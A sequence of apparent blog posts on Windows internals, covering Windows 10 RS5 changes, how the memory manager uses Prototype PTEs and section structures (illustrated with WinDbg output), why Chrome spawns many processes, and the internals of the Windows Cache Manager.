FileLinkInformationEx = 72 /*0x48*/,
FileLinkInformationExBypassAccessCheck = 73 /*0x49*/,
FileStorageReserveIdInformation = 74 /*0x4A*/,
FileCaseSensitiveInformationForceAccessCheck = 75 /*0x4B*/,

The new types of mitigations

Windows 10 RS5 introduces several new types of subj. You can see it below.

· PS_MITIGATION_OPTION_SPECULATIVE_STORE_BYPASS_DISABLE

· PS_MITIGATION_OPTION_ALLOW_DOWNGRADE_DYNAMIC_CODE_POLICY

· PS_MITIGATION_OPTION_CET_SHADOW_STACKS

First mitigation improves Windows immunity to Speculative Store Bypass (SSB) vulnerability. Second as I think is related to Arbitrary Code Guard (ACG). And third adds support of Intel CET anti-exploit technology.

Security Domains

RS5 also brings an interesting term that I believe may be relevant to SESC attacks too. Now EPROCESS'es could be linked to so-called "Security Domain".

New Native API

Ntdll welcomes new API.

MACHINE FRAME

For those who had deal with basics Windows NT or Linux internals concepts, the term "frame" is known. It represents set of registers that have been captured at the moment of interruption or exception: trap frame, exception frame are famous instances. When the frame was captured, later interrupt manager, exception manager or system service manager will return a program execution flow to the original state (pre-interruption) using frame info.

Windows 10 RS5 introduces a new type of frame: machine frame. It is used for Processor Control Block (KPRCB) to capture its state when a some sort of interruption occurs.

Retpoline

The Retpoline mitigation practice is well known in the Linux world. This feature has been used to protect apps from Spectre #2 (preventing branch target injection). Windows 10 RS5 says hi to Retpoline too.

Supporting Intel CET mitigation & a new PTE type

RS5 is armed to support the Intel CET technology that is designed to harden a system from ROP-based attacks more effective. CET introduces a special type of thread' stack - shadow stack that is served by silicon itself. The addresses that are pushed to usual stack are duplicated at shadow stack too. Later CPU can compare both and detect potential ROP attack.

"CET defines a second stack (shadow stack) exclusively used for control transfer operations, in addition to the traditional stack used for control transfer and data. When CET is enabled, CALL instruction pushes the return address into a shadow stack in addition to its normal behavior of pushing return address into the normal stack (no changes to traditional stack operation). The return instructions (e.g. RET) pops return address from both shadow and traditional stacks, and only transfers control to popped address if return addresses from both stacks match. There are restrictions to write operations to shadow stack to make it harder for adversary to modify return address on both copies of stack implemented by changes to page tables. Thus limiting shadow stack usage to call and return operations for purpose of storing return address only. The page table protections for shadow stack are also designed to protect integrity of shadow stack by preventing unintended or malicious switching of shadow stack and/or overflow and underflow of shadow stack." @Intel.

As you can see from the screenshot above, Microsoft has added a new PTE type specially for CET. It's obviously that such PTEs will describe VM pages with CET' shadow stacks data.

CET supporting is deeply integrated into the NT kernel. For example, when thread dies, its shadow stack releases.

↧

What is a Proto-PTE and how Windows VMM works with it

October 13, 2018, 8:14 am

≫ Next: Why Google Chrome runs so much processes

≪ Previous: Windows 10 RS5 introduces a new Software PTE type

A Proto-PTE (Prototype PTE, PPTE) is a basic block of the Windows VMM (Virtual Memory Manager) for help of which the OS can work with memory-mapped files (or Sections in the Native/NT kernel API terms). What I have learned from discussions with Windows Internals researchers, and my own experience, the PPTE is most tricky stuff a researcher can face with. But, in fact, here is nothing complicated with PPTE concept understanding if we can view at it from right side. Honestly, it was already eleven years ago when I defended my coursework at the university that named "Inside Windows XP VMM". I have uploaded its Russian edition to famous KM forum. It was written in SoftICE times when you could break the Windows kernel execution with Ctrl-X and debug a local system without remote actions. :)

That my coursework has covered a lot of VMM subsystems, including, Hyperspace, PTEs, Session space, WSL, PFN database, Sections, Cache Internals. But, unfourtunately, it has been oriented only on x86 architecture. Thus, I took my chapters dedicated to PTE and Section, and has adapted them for actual x64 architecture on today. I have started to learn Windows Internals since 2nd version of the book of the series was released (Inside Windows 2000). Windows Internals and Rootkits are both my favs directions of researching on today as it was more than ten years ago.

A PPTE (that actually is a kind of Software PTE, SPTE) is an original basic block of the VMM that helps it to attach to specific proctess a new view of already mapped section. Mentioned SPTE term just means that the OS organizes structure of such always Invalid PTE by itself, i. e. CPU doesn't know anything about this structure. A task of CPU in dispatching such SPTE (Invalid PTE) is just to interrupt execution of a current thread and forward execution to the NT Kernel KiPageFault (KiTrap0E) handler (formally belongs to Interruption Managers or VMM).

To understand how Windows works with PPTE, let's put attention to the following structures.

Section (nt!_SECTION). The kernel structure that describes section object.
Segment (nt!_SEGMENT). Actually is a core structure of PPTE architecture that contains PPTE page table.
Segment Control Area (SCA, nt!_CONTROL_AREA). Along with SEGMENT is a key structure of Section and for understanding how PPTE works. Control area is intended for storing information that helps VMM to perform I/O operations to read data from file or to write data into it.
Subsection (nt!_SUBSECTION`). Is a data structure that contains a necessary information for calculation an offset inside mapped file via PPTEs

Let's talk about each of them more detailed.

As we can see from the picture above, clients (threads) from separate processes can create sections for one specific file to execute it. For example, all Windows processes use kernel32.dll library that is mapped as section in every process. Basic SECTION structure represents a kernel object that is created when a thread tries to create memory-mapped file. If section is created for a file for the first time, the OS has to initialize related kernel structures like SEGMENT and CONTROL_AREA to describe that memory-mapped file, including, PPTE table. From other side, if a thread tries to create section for the file that already has corresponding VMM structs, its newly created section just attaches a specific SEGMENT. When a client calls Windows API to map some range of file into memory, the VMM just takes corresponding to allocated VM PTEs and performs attaching them to PPTE and these SPTEs now is called the PTE Pointed to Prototype (PTEPP).

Let's look at major fields of the section structure.

typedef struct _SECTION

{

struct _RTL_BALANCED_NODE SectionNode;

UINT64 StartingVpn; //starting virtual page number of mapping
UINT64 EndingVpn; //ending virtual page number

union

{

struct _CONTROL_AREA* ControlArea; //ptr to corresponding control area

struct _FILE_OBJECT* FileObject; //or to file object

struct

{

UINT64 RemoteImageFileObject : 1; //for remote files cases

UINT64 RemoteDataFileObject : 1;

};

}u1;

UINT64 SizeOfSection; //size of section

union

{

ULONG32 LongFlags;

struct _MMSECTION_FLAGS Flags; //flags from ZwCreateSection

}u;
struct
{

ULONG32 InitialPageProtection : 12;

ULONG32 SessionId : 19;

ULONG32 NoValidationNeeded : 1;

};

}SECTION, *PSECTION;

Below you can see CA structure format.

typedef struct _CONTROL_AREA

{

struct _SEGMENT* Segment; //ptr to corresponding segment

union

{

struct _LIST_ENTRY ListHead;

VOID* AweContext;

};

UINT64 NumberOfSectionReferences;

UINT64 NumberOfPfnReferences;

UINT64 NumberOfMappedViews; //count of sections that have been mapped with this CA

UINT64 NumberOfUserReferences;

...

union

{

struct

{

union

{

ULONG32 NumberOfSystemCacheViews;

ULONG32 ImageRelocationStartBit;

};

union

{

LONG32 WritableUserReferences;

struct

{

ULONG32 ImageRelocationSizeIn64k : 16;

ULONG32 LargePage : 1;

ULONG32 AweSection : 1;

ULONG32 SystemImage : 1;

ULONG32 StrongCode : 2;

ULONG32 CantMove : 1;

ULONG32 BitMap : 2;

ULONG32 ImageActive : 1;

ULONG32 ImageBaseOkToReuse : 1;

};

union

{

ULONG32 FlushInProgressCount;

ULONG32 NumberOfSubsections;

struct _MI_IMAGE_SECURITY_REFERENCE* SeImageStub;

};

}e2;

}u2;

...

}CONTROL_AREA, *PCONTROL_AREA; //defines section's properties that are actual for all clients

When a client requests unmap view of section operation, Windows just removes links to corresponding PPTE entries from process's PTE that describes a view of mapped section. Thus, PPTE is comfortable and universal interface for attaching view and detaching it from the specific process address space. And this is its major purpose. The Segment structure contains pointer to PPTE table as we can see below.

typedef struct _SEGMENT

{

struct _CONTROL_AREA* ControlArea; //-> ptr to corresponding CA

ULONG32 TotalNumberOfPtes;

struct _SEGMENT_FLAGS SegmentFlags;

UINT64 NumberOfCommittedPages;

UINT64 SizeOfSegment;

...

struct _MMPTE* PrototypePte; //-> PPTE table that are pointing to Subsections

}SEGMENT, *PSEGMENT;

Another key structure for understanding how Windows uses PPTE to work with Section (memory-mapped file) is so-called Subsection (nt!_SUBSECTION). Subsection is a data structure that contains a necessary information for calculation an offset inside mapped file via PPTEs, which are described this file. For usual binary file there is always (with some exceptions) a single subsection, but for an executable PE files there is one subsection for each PE section plus another one for PE header. A subsection is intended for storing memory protection constants for all PTEs that contain specific PE file section, i. e. VMM will assign to all PTEs that are pointed by Subsection memory protection constant from Sybsection structure.

All PPTEs are referencing to specific subsection, in case of mapping section as binary, all PPTEs will point to single subsection, in case of mapping section as executable, PPTEs will point to specific PE's section subsection. A subsection contains so-called starting sector field that describes beginning of specific section inside PE file (takes this value from PE header - Raw Section Offset / SECTOR_SIZE). Also a subsection contains a pointer to first PPTE in the PPTE table of specific Segment and total number of PPTEs for itself (i. e. number of pages for specific PE section that, in fact, represents its VirtualSize that is rounded to be multiple with PAGE_SIZE).

If we have address of PPTE, we can easy calculate offset inside PE file that this PTE describes (as a distance between base and current PTE). If Pte variable is a pointer to current PPTE, than we can calculate an address of Subsection.

(((PUCHAR)Pte - (PUCHAR)Subsection->SubsectionBase) / sizeof(PTE)) << PAGE_SHIFT + Subsection->StartingSector * SECTOR_SIZE

If Subsection – address of subsection, than first PPTE describes, FirstPte = &Subsection->SubsectionBase[0], and last range, LastPte = &Subsection->SubsectionBase[Subsection->PtesInSubsection]. I. e. if X – address of the section in memory and its Pte, than &Subsection->SubsectionBase[0] <= Pte < &Subsection->SubsectionBase[Subsection->PtesInSubsection].

typedef struct _SUBSECTION
{
struct _CONTROL_AREA* ControlArea;
struct _MMPTE* SubsectionBase;
struct _SUBSECTION* NextSubsection;
...
union
{
      ULONG32 LongFlags;
      struct _MMSUBSECTION_FLAGS SubsectionFlags;
}u;
ULONG32 StartingSector;
ULONG32 NumberOfFullSectors;
ULONG32 PtesInSubsection;
...
}SUBSECTION, *PSUBSECTION;

typedef struct _MMSUBSECTION_FLAGS
{
struct
{
      UINT16 SubsectionAccessed : 1;
      UINT16 Protection : 5;
      UINT16 StartingSector : 10;
};
struct
{
      UINT16 SubsectionStatic : 1;
      UINT16 GlobalMemory : 1;
      UINT16 Spare : 1;
      UINT16 OnDereferenceList : 1;
      UINT16 SectorEndOffset : 12;
};
}MMSUBSECTION_FLAGS, *PMMSUBSECTION_FLAGS;

Let's take a real example.

> !process 0 0

PROCESS ffffca0cabb485c0

SessionId: 0 Cid: 07d0 Peb: ef0697b000 ParentCid: 0338

DirBase: 13692000 ObjectTable: ffffb981ce2b7380 HandleCount: 149.

Image: VSSVC.exe

> !handle 0 3 ffffca0cabb485c0

0030: Object: ffffb981c8277a50 GrantedAccess: 00000003 (Inherit) Entry: ffffb981ce3c70c0

Object: ffffb981c8277a50 Type: (ffffca0ca8c71c50) Directory

ObjectHeader: ffffb981c8277a20 (new version)

HandleCount: 43 PointerCount: 1407269

Directory Object: ffffb981c7c16b20 Name: KnownDlls

Hash Address Type Name

---- ------- ---- ----

00 ffffb981c8287c10 Section kernel32.dll

> !object ffffb981c8287c10

Object: ffffb981c8287c10 Type: (ffffca0ca8d0ada0) Section

ObjectHeader: ffffb981c8287be0 (new version)

HandleCount: 0 PointerCount: 1

Directory Object: ffffb981c8277a50 Name: kernel32.dll

> dt _SECTION ffffb981c8287c10 -r1

nt!_SECTION

+0x000 SectionNode : _RTL_BALANCED_NODE

...

+0x018 StartingVpn : 0

+0x020 EndingVpn : 0

+0x028 u1 : <unnamed-tag>

+0x000 ControlArea : 0xffffca0c`aa900880 _CONTROL_AREA

+0x000 FileObject : 0xffffca0c`aa900880 _FILE_OBJECT

+0x000 RemoteImageFileObject : 0y0

+0x000 RemoteDataFileObject : 0y0

+0x030 SizeOfSection : 0xae000

...

> !ca 0xffffca0c`aa900880

ControlArea @ ffffca0caa900880

Segment ffffb981c8297cb0 Flink ffffca0cabb4d230 Blink ffffca0caab19e00

Section Ref 1 Pfn Ref 6f Mapped Views 2a

User Ref 2b WaitForDel 0 Flush Count a88

File Object ffffca0caa900c90 ModWriteCount 0 System Views 348f

WritableRefs c0000b

Flags (a0) Image File

\Windows\System32\kernel32.dll

Segment @ ffffb981c8297cb0

ControlArea ffffca0caa900880 BasedAddress 00007ffbcb640000

Total Ptes ae

Segment Size ae000 Committed 0

Image Commit 2 Image Info ffffb981c8297cf8

ProtoPtes ffffb981c7f24a90

Flags (c4820000) ProtectionMask

> dq ffffb981c7f24a90

ffffb981`c7f24a90 8a000000`37295121 00000000`2c624860

ffffb981`c7f24aa0 0a000000`2c625121 0a000000`2c626121

ffffb981`c7f24ab0 0a000000`2c627121 0a000000`2c628121 -> Subsection address

We can also take a real example from my coursework for 32bit Windows XP SP3. Let's take a specific cache slot, because creation of PPTE may be delayed in Ring 3 process before someone performed access to it. Print list of slots. For example, at my machine, the next items are existing. In this case, cache manager mapped binary system registry file named NTUSER.DAT. As this file is mapped as binary, here will exist only one subsection for it.

Vacb #186 0x81936170 -> 0xc7080000

File: 0x81749818

Offset: 0x00080000

\Documents and Settings\Art\NTUSER.DAT

We can see that this slot maps file with offset 0x80000 and base address 0xc7080000.

0: kd> !pte 0xc7080000

VA c7080000

PDE at C0300C70 PTE at C031C200

contains 01CF0963 contains 0554A921

pfn 1cf0 -G-DA--KWEV pfn 554a -G--A—KREV

A PTE is valid, than we can restore a content of PPTE from PFN database.

0: kd> !pfn 554a

PFN 0000554A at address 8107FEF0

flink 000018C8 blink / share count 00000001 pteaddress E15B7208

reference count 0001 Cached color 0

restore pte 86D204CE containing page 00496E Active P

Shared

Now we have that PPTE address is 0xE15B7208 and its original content is 0x86D204CE. We can translate it to subsection with formula.

SubsectionAddress = MmNonPagedPoolStart + PrototypeIndex << 3.

86D204CE = 1 00001101101001000000 1 00110 0111 0

| |

| |->is ptr to subsection

|->is mapped file

000011011010010000000111 = DA407 * 8 + 81181000 = 6D2038 + 81181000 = 81853038

Print a subsection.

> dt _subsection 81853038

nt!_SUBSECTION

+0x000 ControlArea : 0x81853008 _CONTROL_AREA

+0x004 u : __unnamed

+0x008 StartingSector : 0

+0x00c NumberOfFullSectors : 0x100

+0x010 SubsectionBase : 0xe15b7008 _MMPTE

+0x014 UnusedPtes : 0

+0x018 PtesInSubsection : 0x100

+0x01c NextSubsection : (null)

and

+0x004 u : __unnamed

+0x000 LongFlags : 0x60

+0x000 SubsectionFlags : _MMSUBSECTION_FLAGS

+0x000 ReadOnly : 0y0

+0x000 ReadWrite : 0y0

+0x000 SubsectionStatic : 0y0

+0x000 GlobalMemory : 0y0

+0x000 Protection : 0y00110 (0x6) - MM_EXECUTE_READWRITE

+0x000 LargePages : 0y0

+0x000 StartingSector4132 : 0y0000000000 (0)

+0x000 SectorEndOffset : 0y000000000000 (0)

Print control area.

> dt _control_area 0x81853008

nt!_CONTROL_AREA

+0x000 Segment : 0xe1559ba0 _SEGMENT

+0x004 DereferenceList : _LIST_ENTRY [ 0x0 - 0x0 ]

+0x00c NumberOfSectionReferences : 1

+0x010 NumberOfPfnReferences : 0xe5

+0x014 NumberOfMappedViews : 4

+0x018 NumberOfSubsections : 1

+0x01a FlushInProgressCount : 0

+0x01c NumberOfUserReferences : 0

+0x020 u : __unnamed

+0x024 FilePointer : 0x81749818 _FILE_OBJECT

+0x028 WaitingForDeletion : (null)

+0x02c ModifiedWriteCount : 0

+0x02e NumberOfSystemCacheViews : 4

Number of subsections – 1, because it was mapped as binary.

As a result.

Get an offset, from which into slot of the cache files was mapped (E15B7208 - e15b7008) / 4 *1000 + 0 = 80000, as we can see in VACB.
Protection bits for virtual pages are granting maximum rights - MM_EXECUTE_READWRITE as we can see into PPTE Protection fiels – 110, i. e. 6.

Let's take more interesting stuff with executable section ole32.dll.

> !ca 817ab818

ControlArea @ 817ab818

Segment e172eaa0 Flink 00000000 Blink 00000000

Section Ref 1 Pfn Ref 8f Mapped Views 13

User Ref 14 WaitForDel 0 Flush Count 0

File Object 81847da0 ModWriteCount 0 System Views 0

Flags (90000a0) Image File HadUserReference Accessed

|->mapped as image

File: \WINDOWS\system32\ole32.dll

Segment @ e172eaa0

ControlArea 817ab818 BasedAddress 774e0000

Total Ptes 13d

WriteUserRef 0 SizeOfSegment 13d000

Committed 0 PTE Template 862a8c3a

Based Addr 774e0000 Image Base 0

Image Commit 7 Image Info e172efd0

ProtoPtes e172ead8

Subsection 1 @ 817ab848

ControlArea 817ab818 Starting Sector 0 Number Of Sectors 2

Base Pte e172ead8 Ptes In Subsect 1 Unused Ptes 0

Flags 11 Sector Offset 0 Protection 1

Subsection 2 @ 817ab868

ControlArea 817ab818 Starting Sector 2 Number Of Sectors 8f8

Base Pte e172eadc Ptes In Subsect 11f Unused Ptes 0

Flags 31 Sector Offset 0 Protection 3

Subsection 3 @ 817ab888

ControlArea 817ab818 Starting Sector 8fa Number Of Sectors 30

Base Pte e172ef58 Ptes In Subsect 6 Unused Ptes 0

Flags 31 Sector Offset 0 Protection 3

Subsection 4 @ 817ab8a8

ControlArea 817ab818 Starting Sector 92a Number Of Sectors 33

Base Pte e172ef70 Ptes In Subsect 7 Unused Ptes 0

Flags 51 Sector Offset 0 Protection 5

Subsection 5 @ 817ab8c8

ControlArea 817ab818 Starting Sector 95d Number Of Sectors c

Base Pte e172ef8c Ptes In Subsect 2 Unused Ptes 0

Flags 11 Sector Offset 0 Protection 1

Subsection 6 @ 817ab8e8

ControlArea 817ab818 Starting Sector 969 Number Of Sectors 69

Base Pte e172ef94 Ptes In Subsect e Unused Ptes 0

Flags 11 Sector Offset 0 Protection 1

It's comfortable to present results inside table. I have used PETools and we can see that ole32 cjntains five sections and first is reserved for the header.

We can see that subsections 2-3, which are mapped to PE sections .text and .orpc are executable, i. e. adress PPTE with code sections. Fourth subsection belongs to global data and has copy-on-write protection. Other are using only for read access.
Second subsection describes first section inside PE file with executable code. In fact, it begins from second sector (400 / SECTOR_SIZE == 2). Virtual address of section is 0x11ef5e, i. e. with rounding to multiple page size 0x11ef5e + 0xA2 = 0x11F000 / PAGE_SIZE = 0x11F, i. e. number of PTEs in subsection. Raw size in header is 0x11f000 / 0x200 = 0x8F8, i. e. number of sectors in subsection.
Third section that also contains an executable code and begins from sector 0x11F400 / 0x200 = 0x8FA. Size is 0x6000 (in this case we take physical, because it larger than virtual, i. e. 0x6000/0x1000 = 6 PTEs.
Forth subsection begins 0x125400 / 0x200 = 0x92A, size 0x7000 / 0x1000 = 7 PTEs.
Fifth 0x12BA00 / 0x200 = 0x95D, size 0x2000 / 0x1000 = 2 PTEs.
Sixth 0x12D200 / 0x200 = 0x969, 0xE000 / 0x1000 = 0xE PTEs.

As final step, let's check pointed above formula at practice. Take 3rd subsection, which describes section of ole32.dll starting from offset (in sectors) 0x8fa.

> dt _subsection 817ab888 SubsectionBase

nt!_SUBSECTION

+0x010 SubsectionBase : 0xe172ef58 _MMPTE

Get content of the first PTE that describes this section.

0: kd> dd 0xe172ef58 l1

e172ef58 0c779121

It is valid, than.

0: kd> !pfn c779

PFN 0000C779 at address 8112B358

flink 000006E7 blink / share count 00000007 pteaddress E172EF58

reference count 0001 Cached color 0

restore pte 862A8C62 containing page 00B8A9 Active P

Shared

862A8C62 = 1 00001100010101010001 1 00011 0001 0;

000011000101010100010001 = C5511 * 8 + 81181000 = 817AB888, this is an address of our subsection.

Now, using pointer to PPTE, get an offset inside file that it describes with help of formula.

(((PUCHAR)Pte - (PUCHAR)Subsection->SubsectionBase) / 4) << 12 + Subsection->StartingSector * SECTOR_SIZE.

(E172EF58 - 0xE172EF58) = 0 + 8fa * 200 = 11F400, that we can find in our table above.

↧

Why Google Chrome runs so much processes

October 18, 2018, 6:32 am

≫ Next: RIP Vitalik aka VK_Intel

≪ Previous: What is a Proto-PTE and how Windows VMM works with it

Reading some topics at the Internet, it became clear that I'm not alone who have wondered why Google Chrome web browser (on Windows) runs too much processes even if one or two tabs have been opened in a browser. This situation looks more strange when I just have opened tabs without any content. In this blog post I want to talk about some hidden features of Chrome, which can be a cause of such behavior. The purpose of a blog post is obvious - try to understand and explain nature of Chrome's processes. As I got no feedback from Chrome evangelists, I have tried to get answers to these questions independently.

As everyone already knew, Chrome web browser is based on a multi-process architecture. This means that it creates more than one process during its work for various purposes. Among others, major advantage of such concept is opening each tab in a separate process that leads to minimizing possible data loss or other tabs crash, when a single web page doesn't respond. In such scenario, you can terminate one non-responsive tab without harming others. Another obvious reason of MP architecture is famous Chrome's sandbox.

Let's look at a simple experiment. We can take a clean Chrome installation and check these strange things with much running processes.

It is clean 64-bit release of Chrome installation, where special experimental features like AppContainer, Strict site isolation and others are turned off. In web browser only a blank web page is opened. WS Private indicator is a counter of physical memory that was committed by the browser. Another indicator, Private Bytes, represents amount of virtual memory was committed by Chrome's processes, but along with resident physical memory, it also includes committed virtual memory that is residing at page file (non resident, swapped out, but committed). Thus, next types of processes Chrome runs as you started it ("from-the-box", clean installation of the 64bit release browser's version at Win10 with default settings).

As you can see from the scheme above, each process is intended for a specific purpose. The Crashpad handler process is so-called a crash-reporting system (link) as Google calls it. From technical info following this link, we can understand that the Crashpad handler helps to the web browser report some sort of info and, probably, crash dumps to Google servers. As they write.

"Crashpad is a library for capturing, storing and transmitting postmortem crash reports from a client to an upstream collection server. Crashpad aims to make it possible for clients to capture process state at the time of crash with the best possible fidelity and coverage, with the minimum of fuss.
Crashpad also provides a facility for clients to capture dumps of process state on-demand for diagnostic purposes."

The Watcher process, as meaning by its name, is serving for to track Chrome's processes state and check whether it hanged.

Chrome leverages GPU to perform (accelerate) drawing some sort of graphics, including, CSS, graphical elements and usual web-page rendering. This process is called GPU process. This feature is turned on by default. And, seems, can't be turned off, even with resetting this option at the browser's options.

Can't be turned off, because, from my experience, even when I disabled this feature, the browser still was instructed to use GPU. Probably, with turning off this feature, the browser haven't to create additional processes for this purpose.

Interesting thing that the GPU process also can be sandboxed with Windows 8+ security feature called AppContainer.

Chrome also contains some security features that theoretically can contribute of creating more processes. For example, the browser has a special security feature that is used for Spectre #1 security vulnerability (link) mitigation. It is called "Strict site isolation".

Yes, with activated feature, each site user opens will be isolated into a separate process. For Spectre #1 this mitigation is useful, because exploiting speculative execution flaws with help of scripting languages, an attacker may steal sensitive user's data that is intended for another site, for example, online banking. Thus, a malicious script from crafted page can get access to trusted site's data that is played in the same browser's process. If Chrome isolates each site in separate process, this situation becomes impossible. But obvious side effect in such scheme is more working Chrome processes into a system.

But if you look at description of this feature, you will be surprised that it turned on by default even if it marked as not working (disabled actually means default behaviour). Probably Chrome's managers have decided to protect users from speculative execution side-channel flaws by default. Thus, it's one more reason why you see a lot of running processes of the browser.

Chrome also can play PDF content in a separate plugin process (default setting). That also implies creating of additional processes for each opened document. PDF isolation inside a separate process is important, because major part of all RCE exploits are being targeted to Adobe Reader of Flash plugins.

Also, according to Chrome's task manager, it can create processes for the web-page frames and browser's extensions (plugins), applications. Processes for various content you can find on the screenshot below.

Conclusion

I've also been testing Google Chrome on Windows 10 to understand what security features it supports. The browser has been shown very good results (Windows 10 RS4).

↧

RIP Vitalik aka VK_Intel

November 3, 2022, 12:51 am

≫ Next: Inside the Windows Cache Manager

≪ Previous: Why Google Chrome runs so much processes

https://www.darkreading.com/careers-and-people/vitali-kremez-dead-apparent-scuba-diving-accident

↧

Inside the Windows Cache Manager

December 2, 2022, 11:18 pm

≫ Next: Dissecting Windows Section Objects

≪ Previous: RIP Vitalik aka VK_Intel

Introduction

The cache is an integral part of the operating system and its hybrid kernel. Roughly speaking, it's just a virtual memory region in the kernel address space, on which the Cache Manager maps file data to provide quick access to them in the future. This access is frequently used by the File System Driver (FSD) or the Windows Memory Manager (VMM). Instead of reading file data from disk every time a user or system needs to access to it, the OS kernel calls the Cache Manager in an attempt to get this data from memory. In turn, the Cache Manager is a set of function in the kernel executable file ntoskrnl.exe, which starts with a prefix Cc. These functions are private, so to get to their names, you need to configure the symbol server settings in WinDbg or IDA.

Learning the Windows Cache Manager is quite a difficult task for beginners. This Windows kernel subsystem is closely related to the VMM, so if you don't have enough knowledge in it, try to understand the basic concepts without going into complicated technical aspects. In addition, you should have some knowledge in the field of file system drivers (FSD), because they are the most frequent clients of the Cache Manager. It's worth to note that the cache concept exists only at the level of file system, lower drivers on the device stack like the volume manager, partition manager, disk driver, and disk port driver don't use it.

This blog post is dedicated to the technical aspects of the Windows Cache Manager and designed for the skilled Windows Internals readers. If you lack knowledge on this topic, read the corresponding chapter in the Windows Internals book and then get back to this post. I would say that this blog post is some kind of technical addition to the chapter about the cache in the book (or I hope it claims..).

Let's take a look at some terms for newbie.

Working Set (WS) - the set of pages in the user mode or kernel mode address space that are currently resident in physical memory. The kernel mode working set called System Working Set.

PTE (Page Table Entry) - a structure that is used by the CPU and VMM to translate virtual addresses to physical ones.

Proto-PTE (Prototype PTE, PPTE) - a special type of so called Software PTE that is used only by the VMM (not CPU) to work with section objects (memory-mapped files) and serves as an intermediate level for the translation mapped section pages to the real hardware PTE. PPTE is a key structure for understanding the section objects.

Segment Control Area (or just Control Area, CA) - a structure that contains information required for performing I/O operations with file data in or from the mapped file. It's stored in the non-paged pool. With the help of CA the VMM can address the same file as binary and as executable.

The basic concepts

The memory region in the kernel mode address space occupied by the cache starts with the value of the VMM variable MmSystemCacheStart and ends with the value of MmSystemCacheEnd. Thus, if X - is a pointer to the memory region that belongs to the cache, then MmSystemCacheStart<=X<=MmSystemCacheEnd. File data in this region are mapped into slots, 256KB blocks of data. The cache has two features, which are a consequence of the fact that the VMM is responsible for its internal implementation.

The section objects maintained by the VMM are used to map file data into slots. Thus, the VMM is responsible for paging file data.
Cache virtual pages can be unloaded to the page file.

These features emphasize the fact that the Cache Manager doesn't know for sure whether the file data is in physical memory or not. Undocumented structure called Virtual Address Control Block (VACB) is used to describe the cache slots, which are reserved in the paged pool. The control blocks are addressed from CcVacbs variable. Each of these blocks controls a specific slot. The variable CcNumberVacbs stores the number of slots.

VACB has the following format.

There are two VACBs lists.

CcVacbFreeList. It's a list of free VACBs, i e those VACBs that are ready for use.
CcVacbLru. A list of all other structures. A VACB has free status if its .ActiveCount field is zero. When reused, the slot address is re-mapped. The following WinDbg command confirms these facts.

r eax=0; !list "-t ntdll!_LIST_ENTRY.Flink -x \"r eax=@eax+1;? @eax;? @$extret-10; dt nt!_VACB @$extret-10\" nt!CcVacbFreeList "

We can use it to print free VACBs and their numbers, for example.

Next from the first - 0x81954fb0=81954fa0 + 10.

We can do the same for the remaining (CcVacbLru).

r eax=0; !list "-t ntdll!_LIST_ENTRY.Flink -x \"r eax=@eax+1;? @eax;? @$extret-10; dt nt!_VACB @$extret-10\" nt!CcVacbLru"

Most of these structures have initialized shared maps and are mapped to the cache. If sum up the last VACB numbers from both lists, u get something like this.

14b+6b3 = 7fe

dd CcNumberVacbs l1

8055f670 000007fe

The virtual address of a specific slot will refer to the PTE pointing to the PPTE, the latter is linked to the subsection that describes the file (usually there's a one subsection that linked to the shared map and maps the file as binary, look at MmMapViewInSystemCache). You can learn more about PPTEs from my blog post here.

The cached file is described by two important structures called a shared cache map and a private cache map. Unlike the shared cache map, the private cache map isn't so interesting for exploring, because it's used for so-called intelligence ahead-read. Let's take a look at the shared cache map. It represents a structure that the Cache Manager maintains for caching a specific file. As in the case of control areas, which are unique for disk files (one is used to map the file as binary and another one to map it as an executable), the shared cache maps are unique as well and are addressed with SECTION_OBJECT_POINTERS structure, the latter is held by the FSD in the FCB structure of a specific file. Thus the Cache Manager knows what exactly slot describes a specific file via VACB, which stores a pointer to the shared cache map.

The cache manager can find this structure for each opened FileObject, because it points to SECTION_OBJECT_POINTERS (FileObject->SectionObjectPointer). The shared cache map is described by the following structure.

The Cache Manager can find out quickly which of the specific files are already mapped (i e have used slots), the shared cache map points to the VACB index array. The first element of the array points to the first 256KB of the file, the second to the next 256KB and so on. In case if the file has size not more than 1MB, i e can fit in four slots, the array InitialVacbs from the shared cache map acts as an index array, otherwise the array is allocated from the paged pool. In any case, the pointer to it is stored in the Vacbs field. All shared cache maps linked into a list with the head in PrivateList (&SharedCacheMap->PrivateList, &PrivateCacheMap->PrivateLinks). Moreover, all shared cache maps are also linked into lists with SharedCacheMapLinks. There's a special function of the Cache Manager CcInitializeCacheMap, which is called by the FSD, and is responsible for initializing a shared cache map (if it hasn't been created yet), creating a section object and creating a private cache map.

VOID CcInitializeCacheMap (__in PFILE_OBJECT FileObject, __in PCC_FILE_SIZES FileSizes, __in BOOLEAN PinAccess, __in PCACHE_MANAGER_CALLBACKS Callbacks, __in PVOID LazyWriteContext)

This function is responsible for.

It creates and initializes the shared cache map if it doesn't exist yet (FileObject->SectionObjectPointer->SharedCacheMap is zeroed), SharedCacheMap->FileObject is initialized by the first file object for which the map is created.
It creates the section object with MmCreateSection. Further, this section will be used to map file data into cache slots.
Creates a VACB index array with CcCreateVacbArray. This function initializes fields .Vacbs and .SectionSize.

If the FSD needs to read data from the cache, it calls CcCopyRead.

Internally, the Cache Manager maps parts of file data with help of CcGetVirtualAddress, this function returns the base address of the data in memory. The function operates only with one VACB and one slot.

The Cache Manager uses the following function to map file data.

PVACB CcGetVacbMiss (IN PSHARED_CACHE_MAP SharedCacheMap, IN LARGE_INTEGER FileOffset, IN OUT PKLOCK_QUEUE_HANDLE LockHandle, IN LOGICAL HasBcbListHeads)

The function searches for a VACB to map file data into cache slots and maps it using MmMapViewInSystemCache (the value for the file mapping is taken from &Vacb->BaseAddress).

The following WinDbg script explores the cache.

Take a look at some printed data from my system.

Therefore, the $Mft file is cached at 0xd90c0000 with an offset 0x00ac0000 from its beginning. Take a look at it.

Let's ask the question how does the kernel maps sections into the cache. The answer is located in the MmMapViewInSystemCache function. Before analyzing it, point out some facts.

The cache PTEs start from address that stores in MmSystemCachePteBase (usually it matches the address of the beginning of the page table, 0xC0000000).
Free cache slots are linked to MMPTE_LIST list to provide quick access to them (see WRK for more info about this structure). The pointer to the head of the list is stored in MmFirstFreeSystemCache. The field .NextEntry in MMPTE_LIST stores a value that points to the next field (next block of PTEs). This value is relative to MmSystemCachePteBase. The MiInitializeSystemCache function is responsible for initializing of the PTEs cache list. The PTEs for the cache are reserved by adjacent blocks, i e to cover 256KB, the block is included 64 PTEs, see MiInitializeSystemCache.

